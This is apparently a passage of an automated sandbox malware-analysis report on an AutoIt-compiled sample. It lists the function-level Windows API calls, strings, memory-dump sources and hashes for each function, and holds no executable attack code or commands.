                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _memmove$_sprintf_strlen
                                                                                                                  • String ID: %02X
                                                                                                                  • API String ID: 1921645428-436463671
                                                                                                                  • Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                                                                                  • Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
                                                                                                                  • Opcode Fuzzy Hash: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                                                                                  • Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
                                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend
                                                                                                                  • String ID: Combobox
                                                                                                                  • API String ID: 3850602802-2096851135
                                                                                                                  • Opcode ID: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                                                                                  • Instruction ID: 528d1b292af097fd122ed4be4541c74d7578eb88e117dd2fe935d7ad7cd5862b
                                                                                                                  • Opcode Fuzzy Hash: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                                                                                  • Instruction Fuzzy Hash: 0A21A5716102096BEB10DE68DC85FDB3398EB59734F20431AFA24A72D1D3B9EC958768
                                                                                                                  APIs
                                                                                                                  • GetWindowTextLengthW.USER32(00000000), ref: 0045134A
                                                                                                                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: LengthMessageSendTextWindow
                                                                                                                  • String ID: edit
                                                                                                                  • API String ID: 2978978980-2167791130
                                                                                                                  • Opcode ID: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                                                                                  • Instruction ID: 5a0e340068a0ba28dc4d1c90c86d8b7761b767731f3a1bde811fb9e5560a91dc
                                                                                                                  • Opcode Fuzzy Hash: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                                                                                  • Instruction Fuzzy Hash: BB2190761102056BEB108F68D894FEB33ADEB89339F10471AFD64D36E1C279DC458B68
                                                                                                                  APIs
                                                                                                                  • Sleep.KERNEL32(00000000), ref: 00476CB0
                                                                                                                  • GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: GlobalMemorySleepStatus
                                                                                                                  • String ID: @
                                                                                                                  • API String ID: 2783356886-2766056989
                                                                                                                  • Opcode ID: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                                                                                  • Instruction ID: 7847cb5f82098321599ebf91c79b9dffd15eff11c36c925ad8cec94a5f412430
                                                                                                                  • Opcode Fuzzy Hash: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                                                                                  • Instruction Fuzzy Hash: 67217130508F0497C211BF6AAC4AB5E7BB8AF84B15F01886DF9C8A14D1DF745528C76F
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: htonsinet_addr
                                                                                                                  • String ID: 255.255.255.255
                                                                                                                  • API String ID: 3832099526-2422070025
                                                                                                                  • Opcode ID: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                                                                                  • Instruction ID: fb726eff09ff94cff080b531f734a3fd27281744828c6f3d0166551fa69e616e
                                                                                                                  • Opcode Fuzzy Hash: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                                                                                  • Instruction Fuzzy Hash: 5211E732600304ABCF10DF69EC85FAA73A8EF45324F04455BF9049B392D635E4518B59
                                                                                                                  APIs
                                                                                                                  • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InternetOpen
                                                                                                                  • String ID: <local>
                                                                                                                  • API String ID: 2038078732-4266983199
                                                                                                                  • Opcode ID: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                                                                                  • Instruction ID: 93d8b03a482712ff69e4757b1f2b0d1c201104d099b6cd2898bf81ba059b6d15
                                                                                                                  • Opcode Fuzzy Hash: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                                                                                  • Instruction Fuzzy Hash: 9311C270680710BAF720CB548E62FBA77E8BB24B01F50844BF9429B6C0D6F4B944D7A9
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _memmove
                                                                                                                  • String ID: u,D
                                                                                                                  • API String ID: 4104443479-3858472334
                                                                                                                  • Opcode ID: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                                                                                  • Instruction ID: 1e149f93898fe9afff494952afced4f728167d7c2cca3c00b97e401526751dc1
                                                                                                                  • Opcode Fuzzy Hash: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                                                                                  • Instruction Fuzzy Hash: 4FF04C722007045AE3149E6ADC41FD7B7ECDBD8714F50442EF74997241E1B8A9858764
                                                                                                                  APIs
                                                                                                                  • _wcslen.LIBCMT ref: 00401B11
                                                                                                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                  • _memmove.LIBCMT ref: 00401B57
                                                                                                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                                    • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                                                                                                                  • String ID: @EXITCODE
                                                                                                                  • API String ID: 2734553683-3436989551
                                                                                                                  • Opcode ID: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                                                                                                  • Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
                                                                                                                  • Opcode Fuzzy Hash: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                                                                                                  • Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _memmove
                                                                                                                  • String ID: Error:
                                                                                                                  • API String ID: 4104443479-232661952
                                                                                                                  • Opcode ID: 47c0561e29c226fab9e20f11d30fc4033f42905d42d91430649e8e798f40a5ad
                                                                                                                  • Instruction ID: e6e9f2aa443a554b8bda50df2a041f2c42dbd20d32390c21629c974d0e28b4a3
                                                                                                                  • Opcode Fuzzy Hash: 47c0561e29c226fab9e20f11d30fc4033f42905d42d91430649e8e798f40a5ad
                                                                                                                  • Instruction Fuzzy Hash: 2101EFB6200115ABC704DF49D981D6AF7A9FF88710708855AF819CB302D774FD20CBA4
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
                                                                                                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                  • wsprintfW.USER32 ref: 0045612A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend_mallocwsprintf
                                                                                                                  • String ID: %d/%02d/%02d
                                                                                                                  • API String ID: 1262938277-328681919
                                                                                                                  • Opcode ID: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                                                                                                                  • Instruction ID: 953f6dd97ce98099cbba652085d0304866be84a46252058ffc4865c1a62d2123
                                                                                                                  • Opcode Fuzzy Hash: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                                                                                                                  • Instruction Fuzzy Hash: 9DF0823274022866D7109BD9AD42FBEB3A8DB49762F00416BFE08E9180E6694854C3B9
                                                                                                                  APIs
                                                                                                                  • InternetCloseHandle.WININET(?), ref: 00442663
                                                                                                                  • InternetCloseHandle.WININET ref: 00442668
                                                                                                                    • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseHandleInternet$ObjectSingleWait
                                                                                                                  • String ID: aeB
                                                                                                                  • API String ID: 857135153-906807131
                                                                                                                  • Opcode ID: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                                                                                  • Instruction ID: 0fa74210230a71b56b5a48e3a0e63043fcf8dca502afcbd281d0c2380f7acdeb
                                                                                                                  • Opcode Fuzzy Hash: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                                                                                  • Instruction Fuzzy Hash: 46E0E67650071467D310AF9ADC00B4BF7DC9F95724F11482FEA4497650C6B5B4408BA4
                                                                                                                  APIs
                                                                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
                                                                                                                  • PostMessageW.USER32(00000000), ref: 00441C05
                                                                                                                    • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FindMessagePostSleepWindow
                                                                                                                  • String ID: Shell_TrayWnd
                                                                                                                  • API String ID: 529655941-2988720461
                                                                                                                  • Opcode ID: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                                                                                  • Instruction ID: aba4e04af0122a293c2d26b46e7c49f9db856b5fc79b6d6ac13cebee95b63d36
                                                                                                                  • Opcode Fuzzy Hash: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                                                                                  • Instruction Fuzzy Hash: EFD0A772BC13013BFA6077745D0FF8B66145B14711F000C3A7B42E61C1D4F8E4018758
                                                                                                                  APIs
                                                                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
                                                                                                                  • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
                                                                                                                    • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FindMessagePostSleepWindow
                                                                                                                  • String ID: Shell_TrayWnd
                                                                                                                  • API String ID: 529655941-2988720461
                                                                                                                  • Opcode ID: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                                                                                  • Instruction ID: e91d5bd0f3095d95abf168919443ed1e5ef8457e9bc9ee6dadeb2d3358a759b2
                                                                                                                  • Opcode Fuzzy Hash: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                                                                                  • Instruction Fuzzy Hash: 61D0A772B843017BFA6077745D0FF8B66145B14711F000C3A7B46A61C1D4F8D4018758
                                                                                                                  APIs
                                                                                                                  • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
                                                                                                                    • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Message_doexit
                                                                                                                  • String ID: AutoIt$Error allocating memory.
                                                                                                                  • API String ID: 1993061046-4017498283
                                                                                                                  • Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                                                                                  • Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
                                                                                                                  • Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                                                                                  • Instruction Fuzzy Hash: F1B092323C030627E50437910D0BF9D26003B64F02F220C067324280D204C90090131D